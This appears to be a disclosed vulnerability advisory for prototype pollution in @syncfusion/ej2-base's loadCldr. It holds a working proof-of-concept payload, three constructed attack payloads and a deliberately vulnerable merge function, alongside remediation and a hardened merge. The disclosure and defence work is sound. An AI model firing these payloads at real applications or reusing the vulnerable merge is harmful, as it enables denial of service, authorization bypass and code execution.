
Prototype Pollution in @syncfusion/ej2-base #208

@gnsehfvlr

Summary

@syncfusion/ej2-base (<= 33.1.44) is vulnerable to Prototype Pollution via loadCldr.

Description

The loadCldr function in @syncfusion/ej2-base copies the keys of caller-supplied data objects without restricting which keys may be written. When that data comes from user-controlled input, an attacker can inject properties through __proto__ or constructor.prototype keys and pollute Object.prototype, so that every object in the application inherits the injected properties.

Attack vectors: a top-level __proto__ key, a __proto__ key nested inside another object, and a constructor.prototype chain.

Proof of Concept

const target = require('@syncfusion/ej2-base');

// 1. Pollute Object.prototype. JSON.parse creates "__proto__" as an own key
//    (an object literal would not), so the merge inside loadCldr writes the
//    nested object through the Object.prototype setter.
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
target.loadCldr({}, malicious);

// 2. Verify pollution on a fresh, unrelated object
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');

Impact

Successful exploitation gives an attacker:

  • Denial of Service (DoS) by overriding methods every object inherits, such as toString or hasOwnProperty
  • Authentication or authorization bypass when a check reads a property (for example an admin flag) that every object now inherits
  • Remote Code Execution (RCE) when combined with a gadget, e.g. polluting the shell option that child_process.spawn reads from its options object (shell:true)

Remediation

Filter keys inside the merge, at every recursion level (a nested __proto__ is as effective as a top-level one), before copying a property from untrusted input:

// Reject the three keys that can reach Object.prototype through a plain object.
function isSafe(key) {
  return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}

Alternatively, build the merge target with Object.create(null) so it has no prototype chain to walk into. That only holds if every nested container the merge creates is also prototype-less: a nested object created with {} still exposes the __proto__ accessor, and a nested __proto__ key reaches Object.prototype through it.
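The following is an added example, not code from @syncfusion/ej2-base and not a copy of loadCldr: a minimal recursive deep merge of the kind described above (unsafeMerge), the same merge hardened with key filtering and prototype-less containers (safeMerge), and a probe that runs each against the three attack vectors and reports whether Object.prototype was polluted. The payloads are constructed for this example, and the third column of the result shows the caveat on the Object.create(null) remediation: applying it only to the top-level target still lets the nested __proto__ payload through.

```javascript
'use strict';
// Added example, not code from @syncfusion/ej2-base: a minimal recursive
// deep merge of the kind the advisory describes (unsafeMerge), the same
// merge with key filtering (safeMerge), and a probe that runs each against
// the three attack vectors and reports whether Object.prototype was polluted.

// Keys that must never be copied from untrusted input into a plain object.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(value) {
  return value !== null && typeof value === 'object' && !Array.isArray(value);
}

// Vulnerable: copies every own key of `from` into `to`, recursing into nested
// objects. JSON.parse creates "__proto__" as an own key, so the lookup
// to["__proto__"] returns Object.prototype and the recursion writes into it;
// to["constructor"]["prototype"] reaches Object.prototype the same way.
function unsafeMerge(to, from) {
  for (const key of Object.keys(from)) {
    const value = from[key];
    if (isPlainObject(value)) {
      if (to[key] === undefined) to[key] = {};
      unsafeMerge(to[key], value);
    } else {
      to[key] = value;
    }
  }
  return to;
}

// Hardened: drops the dangerous keys at every recursion level, only descends
// into containers `to` actually owns, and creates new containers without a
// prototype so there is no chain to walk into.
function safeMerge(to, from) {
  for (const key of Object.keys(from)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = from[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(to, key) || !isPlainObject(to[key])) {
        to[key] = Object.create(null);
      }
      safeMerge(to[key], value);
    } else {
      to[key] = value;
    }
  }
  return to;
}

// Constructed payloads, one per attack vector named in the advisory.
const PAYLOADS = {
  protoDirect: '{"__proto__":{"polluted":"yes"}}',
  protoNested: '{"settings":{"__proto__":{"polluted":"yes"}}}',
  constructorPrototype: '{"constructor":{"prototype":{"polluted":"yes"}}}',
};

// Runs `merge` on a fresh target and reports whether an unrelated object now
// inherits `marker`. The property is removed afterwards so one probe cannot
// contaminate the next.
function pollutes(merge, payloadJson, marker, makeTarget = () => ({})) {
  merge(makeTarget(), JSON.parse(payloadJson));
  const polluted = ({})[marker] !== undefined;
  delete Object.prototype[marker];
  return polluted;
}

// For each vector: the vulnerable merge, the key-filtered merge, and the
// vulnerable merge given an Object.create(null) target while still creating
// nested containers with {} (the second remediation applied only at the top
// level).
function runDemo() {
  const results = {};
  for (const [name, json] of Object.entries(PAYLOADS)) {
    results[name] = {
      unsafe: pollutes(unsafeMerge, json, 'polluted'),
      keyFiltered: pollutes(safeMerge, json, 'polluted'),
      nullProtoTargetOnly: pollutes(unsafeMerge, json, 'polluted', () => Object.create(null)),
    };
  }
  return results;
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Run it with node: every vector pollutes through unsafeMerge, none gets past safeMerge, and the prototype-less top-level target stops the direct __proto__ and constructor.prototype payloads but not the nested one, because the {} created for "settings" reintroduces the __proto__ accessor.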
